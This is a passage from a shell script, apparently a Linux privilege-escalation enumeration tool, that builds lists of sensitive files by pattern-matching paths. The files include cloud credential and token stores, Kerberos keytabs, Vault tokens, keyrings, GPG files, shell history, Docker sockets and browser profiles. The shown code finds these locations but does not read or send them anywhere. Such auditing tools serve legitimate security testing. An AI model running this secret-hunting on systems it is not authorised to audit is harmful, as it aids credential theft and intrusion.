"$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -v -E '/lib' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -v -E 'README.gnupg' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^" | grep -E "\.mozilla$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^" | grep -E "google-chrome$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e 